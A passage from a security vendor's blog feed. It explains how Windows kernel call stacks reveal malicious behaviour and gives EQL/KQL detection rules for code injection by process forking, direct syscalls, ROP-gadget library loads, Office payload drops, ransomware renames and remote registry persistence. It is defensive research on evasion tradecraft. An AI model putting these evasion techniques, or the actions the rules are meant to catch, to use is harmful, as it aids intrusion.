<p><img src="https://www.elastic.co/kr/security-labs/assets/images/inside-microsofts-plan-to-kill-pplfault/WinDbg-Output-25936.jpg" alt="Build 25936 using page hashes only for services.exe" /></p>
<p>Here is the WinDbg output for build 25941, which includes the fix:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/inside-microsofts-plan-to-kill-pplfault/WinDbg-Output-25941.jpg" alt="Build 25941 using page hashes for both services.exe and the PPLFault payload DLL loaded over SMB" /></p>
<h3>Conclusion</h3>
<p>Despite taking <a href="https://www.elastic.co/kr/security-labs/forget-vulnerable-drivers-admin-is-all-you-need">longer than it perhaps should</a>, it's exciting to see Microsoft taking steps to defend PPL processes (including Anti-Malware) from malware running as admin, and users will benefit if this improvement reaches GA soon. Many features in Insider, even security features, are not available in (and may never reach) GA. Microsoft is very conservative when it comes to changes with potential stability, compatibility, or performance risk; memory manager changes are among the risker types. For example, the PreviousMode kernel exploit mitigation <a href="https://twitter.com/GabrielLandau/status/1597001955909697536?s=20">spotted in Insider last November</a> still hasn’t reached GA, even after <em>at least</em> 10 months.</p>
<p><em>Special thanks to <a href="https://twitter.com/0gtweet">Grzegorz Tworek</a> for his help reverse engineering some kernel functions.</em></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/inside-microsofts-plan-to-kill-pplfault/photo-edited-04@2x.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Peeling back the curtain with call stacks]]></title>
            <link>https://www.elastic.co/kr/security-labs/peeling-back-the-curtain-with-call-stacks</link>
            <guid>peeling-back-the-curtain-with-call-stacks</guid>
            <pubDate>Wed, 13 Sep 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[In this article, we'll show you how we contextualize rules and events, and how you can leverage call stacks to better understand any alerts you encounter in your environment.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Elastic Defend provides over <a href="https://github.com/elastic/protections-artifacts/tree/main/behavior/rules">550 rules</a> (and counting) to detect and stop malicious behavior in real time on endpoints. We recently <a href="https://www.elastic.co/kr/security-labs/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks">added kernel call stack enrichments</a> to provide additional context to events and alerts. Call stacks are a win-win-win for behavioral protections, simultaneously improving false positives, false negatives, and alert explainability. In this article, we'll show you how we achieve all three of these, and how you can leverage call stacks to better understand any alerts you encounter in your environment.</p>
<h2>What is a call stack?</h2>
<p>When a thread running function A calls function B, the CPU automatically saves the current instruction’s address (within A) to a thread-specific region of memory called the stack. This saved pointer is known as the return address - it's where execution will resume once the B has finished its job. If B were to call a third function C, then a return address within B will also be saved to the stack. These return addresses can be retrieved through a process known as a <a href="https://learn.microsoft.com/en-us/windows/win32/debug/capturestackbacktrace">stack walk</a>, which reconstructs the sequence of function calls that led to the current thread state. Stack walks list return addresses in reverse-chronological order, so the most recent function is always at the top.</p>
<p>In Windows, when we double-click on <strong>notepad.exe</strong>, for example, the following series of functions are called:</p>
<ul>
<li>The green section is related to base thread initialization performed by the operating system and is usually identical across all operations (file, registry, process, library, etc.)</li>
<li>The red section is the user code; it is often composed of multiple modules and provides approximate details of how the process creation operation was reached</li>
<li>The blue section is the Win32 and Native API layer; this is operation-specific, including the last 2 to 3 intermediary Windows modules before forwarding the operation details for effective execution in kernel mode</li>
</ul>
<p>The following screenshot depicts the call stack for this execution chain:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image17.png" alt="" /></p>
<p>Here is an example of file creation using <strong>notepad.exe</strong> where we can see a similar pattern:</p>
<ul>
<li>The blue part lists the last user mode intermediary Windows APIs before forwarding the create file operation to kernel mode drivers for effective execution</li>
<li>The red section includes functions from <strong>user32.dll</strong> and <strong>notepad.exe</strong>, which indicate that this file operation was likely initiated via GUI</li>
<li>The green part represents the initial thread initialization</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image19.png" alt="" /></p>
<h2>Events Explainability</h2>
<p>Apart from using call stacks for finding known bad, like <a href="https://www.elastic.co/kr/security-labs/hunting-memory">unbacked memory regions</a> with RWX permissions that may be the remnants of prior code injection. Call stacks provide very low-level visibility that often reveals greater insights than logs can otherwise provide.</p>
<p>As an example, while hunting for suspicious process executions started by <strong>WmiPrvSe.exe</strong> via WMI, you find this instance of <strong>notepad.exe</strong>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image21.png" alt="" /></p>
<p>Reviewing the standard event log fields, you may expect that it was started using the <a href="https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/win32-process">Win32_Process</a> class using the <strong>wmic.exe process call create notepad.exe</strong> syntax. However, the event details describe a series of modules and functions:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image12.png" alt="" /></p>
<p>The blue section depicts the standard intermediary <strong>CreateProcess</strong> Windows APIs, while the red section highlights better information in that we can see that the DLL before the first call to <strong>CreateProcessW</strong> is <strong>wbemcons.dll</strong> and when inspecting its properties we can see that it’s related to <a href="https://learn.microsoft.com/en-us/windows/win32/wmisdk/commandlineeventconsumer">WMI Event Consumers</a>. We can conclude that this <strong>notepad.exe</strong> instance is likely related to a WMI Event Subscription. This will require specific incident response steps to mitigate the WMI persistence mechanism.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image22.png" alt="" /></p>
<p>Another great example is Windows scheduled tasks. When executed, they are spawned as children of the Schedule service, which runs within a <strong>svchost.exe</strong> host process. Modern Windows 11 machines may have 50 or more <strong>svchost.exe</strong> processes running.  Fortunately, the Schedule service has a specific process argument <strong>-s Schedule</strong> which differentiates it:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image8.png" alt="" /></p>
<p>In older Windows versions, the Scheduled Tasks service is a member of the Network Service group and executed as a component of the <strong>netsvcs</strong> shared <strong>svchost.exe</strong> instance. Not all children of this process are necessarily scheduled tasks in these older versions:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image2.png" alt="" /></p>
<p>Inspecting the call stack on both versions, we can see the module that is adjacent to the <strong>CreateProcess</strong> call is the same <strong>ubpm.dll</strong> (Unified Background Process Manager DLL) executing the exported function <strong>ubpm.dll!UbpmOpenTriggerConsumer</strong>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image4.png" alt="" /></p>
<p>Using the following KQL query, we can hunt for task executions on both versions:</p>
<pre><code>event.action :&quot;start&quot; and 
process.parent.name :&quot;svchost.exe&quot; and process.parent.args : netsvcs and 
process.parent.thread.Ext.call_stack_summary : *ubpm.dll* 
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image18.png" alt="" /></p>
<p>Another interesting example occurs when a user double-clicks a script file from a ZIP archive that was opened using Windows Explorer. Looking at the process tree, you will see that <strong>explorer.exe</strong> is the parent and the child is a script interpreter process like <strong>wscript.exe</strong> or <strong>cmd.exe</strong>.</p>
<p>This process tree can be confused with a user double-clicking a script file from any location on the file system, which is not very suspicious. But if we inspect the call stack we can see that the parent stack is pointing to <strong>zipfld.dll</strong> (Zipped Folders Shell Extension):</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image20.png" alt="" /></p>
<h2>Detection Examples</h2>
<p>Now that we have a better idea of how to use the call stack to better interpret events, let’s explore some advanced detection examples per event type.</p>
<h3>Process</h3>
<h4>Suspicious Process Creation via Reflection</h4>
<p><a href="https://www.deepinstinct.com/blog/dirty-vanity-a-new-approach-to-code-injection-edr-bypass">Dirty Vanity</a> is a recent code-injection technique that abuses process forking to execute shellcode within a copy of an existing process. When a process is forked, the OS makes a copy of an existing process, including its address space and any <a href="https://learn.microsoft.com/en-us/windows/win32/sysinfo/handle-inheritance">inheritable</a> handles therein.</p>
<p>When executed, Dirty Vanity will fork an instance of a targeted process (already running or a sacrificial one) and then inject into it. Using process creation notification <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nc-ntddk-pcreate_process_notify_routine_ex">callbacks</a> won’t log forked processes because the forked process initial thread isn’t executed. But in the case of this injection technique, the forked process will be injected and a thread will be started, which triggers the process start event log with the following call stack:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image6.png" alt="" /></p>
<p>We can see the call to <strong>RtlCreateProcessReflection</strong> and <strong>RtlCloneUserProcess</strong> to fork the process. Now we know that this is a forked process, and the next question is “Is this common in normal conditions?” While diagnostically this behavior appears to be common and alone, it is not a strong signal of something malicious. Checking further to see if the forked processes perform any network connections, loads DLLs, or spawns child processes revealed to be less common and made for good detections:</p>
<pre><code>// EQL detecting a forked process spawning a child process - very suspicious

process where event.action == &quot;start&quot; and

descendant of 
   [process where event.action == &quot;start&quot; and 
   _arraysearch(process.parent.thread.Ext.call_stack, $entry, 
   $entry.symbol_info: 
    (&quot;*ntdll.dll!RtlCreateProcessReflection*&quot;, 
    &quot;*ntdll.dll!RtlCloneUserProcess*&quot;))] and

not (process.executable : 
      (&quot;?:\\WINDOWS\\SysWOW64\\WerFault.exe&quot;, 
      &quot;?:\\WINDOWS\\system32\\WerFault.exe&quot;) and
     process.parent.thread.Ext.call_stack_summary : 
      &quot;*faultrep.dll|wersvc.dl*&quot;)
</code></pre>
<pre><code>// EQL detecting a forked process loading a network DLL 
//  or performs a network connection - very suspicious

sequence by process.entity_id with maxspan=1m
 [process where event.action == &quot;start&quot; and
  _arraysearch(process.parent.thread.Ext.call_stack, 
  $entry, $entry.symbol_info: 
    (&quot;*ntdll.dll!RtlCreateProcessReflection*&quot;, 
    &quot;*ntdll.dll!RtlCloneUserProcess*&quot;))]
 [any where
  (
   event.category : (&quot;network&quot;, &quot;dns&quot;) or 
   (event.category == &quot;library&quot; and 
    dll.name : (&quot;ws2_32.dll&quot;, &quot;winhttp.dll&quot;, &quot;wininet.dll&quot;))
  )]
</code></pre>
<p>Here’s an example of forking <strong>explore.exe</strong> and executing shellcode that spawns <strong>cmd.exe</strong> from the forked <strong>explorer.exe</strong> instance:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image13.png" alt="" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image14.png" alt="" /></p>
<h3>Direct Syscall via Assembly Bytes</h3>
<p>The second and final example for process events is process creation via direct syscall. This directly uses the syscall instruction instead of calling the <strong>NtCreateProcess</strong> API. Adversaries may use <a href="https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs">this method</a> to avoid security products that are reliant on usermode API hooking (which Elastic Defend is not):</p>
<pre><code>process where event.action : &quot;start&quot; and 

// EQL detecting a call stack not ending with ntdll.dll 
not process.parent.thread.Ext.call_stack_summary : &quot;ntdll.dll*&quot; and 

/* last call in the call stack contains bytes that execute a syscall
 manually using assembly &lt;mov r10,rcx, mov eax,ssn, syscall&gt; */

_arraysearch(process.parent.thread.Ext.call_stack, $entry,
 ($entry.callsite_leading_bytes : (&quot;*4c8bd1b8??????000f05&quot;, 
 &quot;*4989cab8??????000f05&quot;, &quot;*4c8bd10f05&quot;, &quot;*4989ca0f05&quot;)))
</code></pre>
<p>This example matches when the final memory region in the call stack is unbacked and contains assembly bytes that end with the syscall instruction (<strong>0F05</strong>):</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image16.png" alt="" /></p>
<h2>File</h2>
<h3>Suspicious Microsoft Office Embedded Object</h3>
<p>The following rule logic identifies suspicious file extensions written by a Microsoft Office process from an embedded OLE stream, frequently used by malicious documents to drop payloads for initial access.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image7.png" alt="" /></p>
<pre><code>// EQL detecting file creation event with call stack indicating 
// OleSaveToStream call to save or load the embedded OLE object

file where event.action != &quot;deletion&quot; and 

process.name : (&quot;winword.exe&quot;, &quot;excel.exe&quot;, &quot;powerpnt.exe&quot;) and

_arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info:
 (&quot;*!OleSaveToStream*&quot;, &quot;*!OleLoad*&quot;)) and
(
 file.extension : (&quot;exe&quot;, &quot;dll&quot;, &quot;js&quot;, &quot;vbs&quot;, &quot;vbe&quot;, &quot;jse&quot;, &quot;url&quot;, 
 &quot;chm&quot;, &quot;bat&quot;, &quot;mht&quot;, &quot;hta&quot;, &quot;htm&quot;, &quot;search-ms&quot;) or

 /* PE &amp; HelpFile */
 file.Ext.header_bytes : (&quot;4d5a*&quot;, &quot;49545346*&quot;)
 )
</code></pre>
<p>Example of matches :</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image9.png" alt="" /></p>
<h3>Suspicious File Rename from Unbacked Memory</h3>
<p>Certain ransomware may inject into signed processes before starting their encryption routine. File rename and modification events will appear to originate from a trusted process, potentially bypassing some heuristics that exclude signed processes as presumed false positives. The following KQL query looks for file rename of documents, from a signed binary and with a suspicious call stack:</p>
<pre><code>file where event.action : &quot;rename&quot; and 
  
process.code_signature.status : &quot;trusted&quot; and file.extension != null and 

file.Ext.original.name : (&quot;*.jpg&quot;, &quot;*.bmp&quot;, &quot;*.png&quot;, &quot;*.pdf&quot;, &quot;*.doc&quot;, 
&quot;*.docx&quot;, &quot;*.xls&quot;, &quot;*.xlsx&quot;, &quot;*.ppt&quot;, &quot;*.pptx&quot;) and

not file.extension : (&quot;tmp&quot;, &quot;~tmp&quot;, &quot;diff&quot;, &quot;gz&quot;, &quot;download&quot;, &quot;bak&quot;, 
&quot;bck&quot;, &quot;lnk&quot;, &quot;part&quot;, &quot;save&quot;, &quot;url&quot;, &quot;jpg&quot;,  &quot;bmp&quot;, &quot;png&quot;, &quot;pdf&quot;, &quot;doc&quot;, 
&quot;docx&quot;, &quot;xls&quot;, &quot;xlsx&quot;, &quot;ppt&quot;, &quot;pptx&quot;) and 

process.thread.Ext.call_stack_summary :
(&quot;ntdll.dll|kernelbase.dll|Unbacked&quot;,
 &quot;ntdll.dll|kernelbase.dll|kernel32.dll|Unbacked&quot;, 
 &quot;ntdll.dll|kernelbase.dll|Unknown|kernel32.dll|ntdll.dll&quot;, 
 &quot;ntdll.dll|kernelbase.dll|Unknown|kernel32.dll|ntdll.dll&quot;, 
 &quot;ntdll.dll|kernelbase.dll|kernel32.dll|Unknown|kernel32.dll|ntdll.dll&quot;, 
 &quot;ntdll.dll|kernelbase.dll|kernel32.dll|mscorlib.ni.dll|Unbacked&quot;, 
 &quot;ntdll.dll|wow64.dll|wow64cpu.dll|wow64.dll|ntdll.dll|kernelbase.dll|
 Unbacked&quot;, &quot;ntdll.dll|wow64.dll|wow64cpu.dll|wow64.dll|ntdll.dll|
 kernelbase.dll|Unbacked|kernel32.dll|ntdll.dll&quot;, 
 &quot;ntdll.dll|Unbacked&quot;, &quot;Unbacked&quot;, &quot;Unknown&quot;)
</code></pre>
<p>Here are some examples of matches where <strong>explorer.exe</strong> (Windows Explorer) is injected by the <a href="https://www.bleepingcomputer.com/news/security/knight-ransomware-distributed-in-fake-tripadvisor-complaint-emails/">KNIGHT/CYCLOPS</a> ransomware:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image30.png" alt="" /></p>
<h3>Executable File Dropped by an Unsigned Service DLL</h3>
<p>Certain types of malware maintain their presence by disguising themselves as Windows service DLLs. To be recognized and managed by the Service Control Manager, a service DLL must export a function named <strong>ServiceMain</strong>. The KQL query below helps identify instances where an executable file is created, and the call stack includes the <strong>ServiceMain</strong> function.</p>
<pre><code>event.category : file and 
 file.Ext.header_bytes :4d5a* and process.name : svchost.exe and 
 process.thread.Ext.call_stack.symbol_info :*!ServiceMain*
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image3.png" alt="" /></p>
<h2>Library</h2>
<h3>Unsigned Print Monitor Driver Loaded</h3>
<p>The following EQL query identifies the loading of an unsigned library by the print spooler service where the call stack indicates the load is coming from <strong>SplAddMonitor</strong>. Adversaries may use <a href="https://attack.mitre.org/techniques/T1547/010/">port monitors</a> to run an adversary-supplied DLL during system boot for persistence or privilege escalation.</p>
<pre><code>library where
process.executable : (&quot;?:\\Windows\\System32\\spoolsv.exe&quot;, 
&quot;?:\\Windows\\SysWOW64\\spoolsv.exe&quot;) and not dll.code_signature.status : 
&quot;trusted&quot; and _arraysearch(process.thread.Ext.call_stack, $entry, 
$entry.symbol_info: &quot;*localspl.dll!SplAddMonitor*&quot;)
</code></pre>
<p>Example of match:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image5.png" alt="" /></p>
<h3>Potential Library Load via ROP Gadgets</h3>
<p>This EQL rule identifies the loading of a library from unusual <strong>win32u</strong> or <strong>ntdll</strong> offsets. This may indicate an attempt to bypass API monitoring using Return Oriented Programming (ROP) assembly gadgets to execute a syscall instruction from a trusted module.</p>
<pre><code>library where
// adversaries try to use ROP gadgets from ntdll.dll or win32u.dll 
// to construct a normal-looking call stack

process.thread.Ext.call_stack_summary : (&quot;ntdll.dll|*&quot;, &quot;win32u.dll|*&quot;) and 

// excluding normal Library Load APIs - LdrLoadDll and NtMapViewOfSection
not _arraysearch(process.thread.Ext.call_stack, $entry, 
 $entry.symbol_info: (&quot;*ntdll.dll!Ldr*&quot;, 
 &quot;*KernelBase.dll!LoadLibrary*&quot;, &quot;*ntdll.dll!*MapViewOfSection*&quot;))
</code></pre>
<p>This example matches when <a href="https://www.kitploit.com/2023/06/atomldr-dll-loader-with-advanced.html">AtomLdr</a> loads a DLL using ROP gadgets from <strong>win32u.dll</strong> instead of using <strong>ntdll</strong>’s load library APIs (<strong>LdrLoadDll</strong> and <strong>NtMapViewOfSection</strong>).</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image1.png" alt="" /></p>
<h3>Evasion via LdrpKernel32 Overwrite</h3>
<p>The [LdrpKernel32(https://github.com/rbmm/LdrpKernel32DllName) evasion is an interesting technique to hijack the early execution of a process during the bootstrap phase by overwriting the bootstrap DLL name referenced in <strong>ntdll.dll</strong> memory– forcing the process to load a malicious DLL.</p>
<pre><code>library where 
 
// BaseThreadInitThunk must be exported by the rogue bootstrap DLL
 _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info :
  &quot;*!BaseThreadInitThunk*&quot;) and

// excluding kernel32 that exports normally exports BasethreadInitThunk
not _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info
 (&quot;?:\\Windows\\System32\\kernel32.dll!BaseThreadInitThunk*&quot;, 
 &quot;?:\\Windows\\SysWOW64\\kernel32.dll!BaseThreadInitThunk*&quot;, 
 &quot;?:\\Windows\\WinSxS\\*\\kernel32.dll!BaseThreadInitThunk*&quot;, 
 &quot;?:\\Windows\\WinSxS\\Temp\\PendingDeletes\\*!BaseThreadInitThunk*&quot;, 
 &quot;\\Device\\*\\Windows\\*\\kernel32.dll!BaseThreadInitThunk*&quot;))
</code></pre>
<p>Example of match:
<img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image15.png" alt="" /></p>
<h2>Suspicious Remote Registry Modification</h2>
<p>Similar to the scheduled task example, the remote registry service is hosted in <strong>svchost.exe</strong>. We can use the call stack to detect registry modification by monitoring when the Remote Registry service points to an executable or script file. This may indicate an attempt to move laterally via remote configuration changes.</p>
<pre><code>registry where 

event.action == &quot;modification&quot; and 

user.id : (&quot;S-1-5-21*&quot;, &quot;S-1-12-*&quot;) and 

 process.name : &quot;svchost.exe&quot; and 

// The regsvc.dll in call stack indicate that this is indeed the 
// svchost.exe instance hosting the Remote registry service

process.thread.Ext.call_stack_summary : &quot;*regsvc.dll|rpcrt4.dll*&quot; and

 (
  // suspicious registry values
  registry.data.strings : (&quot;*:\\*\\*&quot;, &quot;*.exe*&quot;, &quot;*.dll*&quot;, &quot;*rundll32*&quot;, 
  &quot;*powershell*&quot;, &quot;*http*&quot;, &quot;* /c *&quot;, &quot;*COMSPEC*&quot;, &quot;\\\\*.*&quot;) or
  
  // suspicious keys like Services, Run key and COM
  registry.path :
         (&quot;HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ServiceDLL&quot;,
          &quot;HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath&quot;,
          &quot;HKEY_USERS\\*Classes\\*\\InprocServer32\\&quot;,
          &quot;HKEY_USERS\\*Classes\\*\\LocalServer32\\&quot;,
          &quot;H*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*&quot;) or
  
  // potential attempt to remotely disable a service 
  (registry.value : &quot;Start&quot; and registry.data.strings : &quot;4&quot;)
  )
</code></pre>
<p>This example matches when the Run key registry value is modified remotely via the Remote Registry service:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/image11.png" alt="" /></p>
<h2>Conclusion</h2>
<p>As we’ve demonstrated, call stacks are not only useful for finding known bad patterns, but also for reducing ambiguity in standard EDR events, and easing behavior interpretation. The examples we've provided here represent just a minor portion of the potential detection possibilities achievable by applying enhanced enrichment to the same dataset.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/peeling-back-the-curtain-with-call-stacks/photo-edited-10@2x.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Upping the Ante: Detecting In-Memory Threats with Kernel Call Stacks]]></title>
            <link>https://www.elastic.co/kr/security-labs/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks</link>
            <guid>upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks</guid>
            <pubDate>Wed, 31 May 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[We aim to out-innovate adversaries and maintain protections against the cutting edge of attacker tradecraft. With Elastic Security 8.8, we added new kernel call stack based detections which provide us with improved efficacy against in-memory threats.]]></description>
            <content:encoded><![CDATA[<h2>Intro</h2>
<p>Elastic Security for endpoint, with its roots in Endgame, has long led the industry for in-memory threat detection. We <a href="https://www.elastic.co/kr/security-labs/hunting-memory">pioneered</a> and patented many detection technologies such as kernel <a href="https://image-ppubs.uspto.gov/dirsearch-public/print/downloadPdf/20170329973">thread start</a> preventions, call stack <a href="https://image-ppubs.uspto.gov/dirsearch-public/print/downloadPdf/11151247">anomaly hunting</a>, and <a href="https://image-ppubs.uspto.gov/dirsearch-public/print/downloadPdf/11151251">module stomping</a> discovery. However, adversaries continue to innovate and evade detections. For example, in response to our improved <a href="https://www.elastic.co/kr/blog/detecting-cobalt-strike-with-memory-signatures">memory signature</a> protection, adversaries developed a flurry of new <a href="https://www.cobaltstrike.com/blog/cobalt-strike-and-yara-can-i-have-your-signature/">sleep based</a> evasions. We aim to out-innovate adversaries and maintain protections against the cutting edge of attacker tradecraft. With Elastic Security 8.8, we added new kernel call stack based detections which provide us with improved efficacy against in-memory threats.</p>
<p>Before we get started, it's important to know what call stacks are and why they’re valuable for detection engineering. A <a href="https://en.wikipedia.org/wiki/Call_stack">call stack</a> is the ordered sequence of functions that are executed to achieve a behavior of a program. It shows in detail which functions (and their associated modules) were executed to lead to a behavior like a new file or process being created. Knowing a behavior’s call stack, we can build detections with detailed contextual information about what a program is doing and how it’s doing it.</p>
<h2>Deep Visibility</h2>
<p>The new call stack based detection capability leverages our existing deep in-line kernel visibility for the most common system behaviors (process, file, registry, library, etc). With each event, we capture the call stack for the activity. This is later enriched with module information, symbols, and evidence of suspicious activity. This gives us <a href="https://learn.microsoft.com/en-us/sysinternals/downloads/procmon">procmon</a>-like visibility in real-time, powering advanced preventions for in-memory tradecraft.</p>
<p>Process creation call stack fields : <img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image12.jpg" alt="" /></p>
<p>File, registry and library call stack fields: <img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image8.jpg" alt="" /></p>
<h2>New Rules</h2>
<p>Additional visibility wouldn’t raise the bar unless we could pair it with tuned, high confidence preventions. In 8.8, behavior protection comes out of the box with 30+ rules to provide us with high efficacy against cutting edge attacker techniques such as: - Direct syscalls - Callback-based evasion - Module Stomping - Library loading from unbacked region - Process created from unbacked region - Many more</p>
<p>Call stacks are a powerful data source that can be used to improve protection against non-memory-based threats as well. For example, the following EQL queries look for the creation of a child process or an executable file extension from an Office process with a call stack containing <code>VBE7.dll</code> (a strong sign of the presence of a macro-enabled document). This increases the signal and coverage of the rule logic while reducing the necessary tuning efforts compared to just process or file creation events with no call stack information:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image29.jpg" alt="" /></p>
<p>Below are some examples of matches where Macro-enabled malicious Excel and Word documents spawning a child process where the call stack refers to <code>vbe7.dll</code> :</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image9.jpg" alt="" /></p>
<p>Here, we can see a malicious XLL file opened via Excel spawning a legitimate <code>browser\_broker.exe</code> to inject into. The parent call stack indicates that the process creation call is coming from the <code>[xlAutoOpen](https://learn.microsoft.com/en-us/office/client-developer/excel/xlautoopen)</code> function:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image11.jpg" alt="" /></p>
<p>The same enrichment is also valuable in library load and registry events. Below is an example of loading the Microsoft Common Language Runtime <code>CLR.DLL</code> module from a suspicious call stack (unbacked memory region with RWX permissions) using the <a href="https://github.com/BishopFox/sliver/wiki/Using-3rd-party-tools">Sliver execute-assembly</a> command to load external .NET assemblies:</p>
<pre><code>library where dll.name : &quot;clr.dll&quot; and
process.thread.Ext.call_stack_summary : &quot;*mscoreei.dll|Unbacked*&quot;
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image4.jpg" alt="" /></p>
<p>Hunting for suspicious modification of certain registry keys such as the Run key for persistence tends to be noisy and very common in legit software but if we add the call stack signal to the logic, the suspicion level is significantly increased :</p>
<pre><code>registry where 
 registry.path : &quot;H*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*&quot;
// the creating thread's stack contains frames pointing outside any known executable image
 and process.thread.Ext.call_stack_contains_unbacked == true
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image2.jpg" alt="" /></p>
<p>Another “fun” example is the use of the call stack information to detect rogue instances of core system processes that normally have very specific functionality. By signaturing their normal call stacks, we can easily identify outliers. For example, <code>WerFault.exe</code> and <code>wermgr.exe</code> are among the most attractive targets for masquerading:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image30.jpg" alt="" /></p>
<p>Examples of matches:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image9.jpg" alt="" /></p>
<p>Apart from the use of call stack data for finding suspicious behaviors, it’s also useful when it comes to excluding false positives from behavior detections in a more granular way. This also helps reduce evasion opportunities.</p>
<p>A good example is a detection rule looking for unusual Microsoft Office child processes. This rule is used to <a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_microsoft_office_fetching_remote_content.toml#L26">exclude</a> <code>splwow64.exe</code> , which can be legitimately spawned by printing activity. Excluding it by <code>process.executable</code> creates an evasion opportunity via process hollowing or injection, which can make the process tree look normal. We can now mitigate this evasion by requiring such process creations to come from <code>winspool.drv!OpenPrinter</code> :</p>
<pre><code>process where event.action == &quot;start&quot; and
  process.parent.name : (&quot;WINWORD.EXE&quot;, &quot;EXCEL.EXE&quot;, &quot;POWERPNT.EXE&quot;, &quot;MSACCESS.EXE&quot;, &quot;mspub.exe&quot;, &quot;fltldr.exe&quot;, &quot;visio.exe&quot;) and
// excluding splwow64.exe only if it’s parent callstack is coming from winspool.drv module  
not (process.executable : &quot;?:\\Windows\\splwow64.exe&quot; and``_arraysearch(process.parent.thread.Ext.call_stack, $entry, $entry.symbol_info: (&quot;?:\\Windows\\System32\\winspool.drv!OpenPrinter*&quot;, &quot;?:\\Windows\\SysWOW64\\winspool.drv!OpenPrinter*&quot;)))
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image3.jpg" alt="" /></p>
<p>To reduce event volumes, call stack information is collected on the endpoint and processed for detections but not always streamed in events. To always include call stacks in streamed events an advanced option is available in Endpoint policy:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image7.jpg" alt="" /></p>
<h2>C2 Coverage</h2>
<p>Elastic Endpoint makes quick work detecting some of the top C2 frameworks active today. See below for a screenshot detecting Nighthawk, BruteRatel, CobaltStrike, and ATP41’s <a href="https://www.trendmicro.com/vinfo/gb/security/news/cybercrime-and-digital-threats/earth-baku-returns">StealthVector</a>.</p>
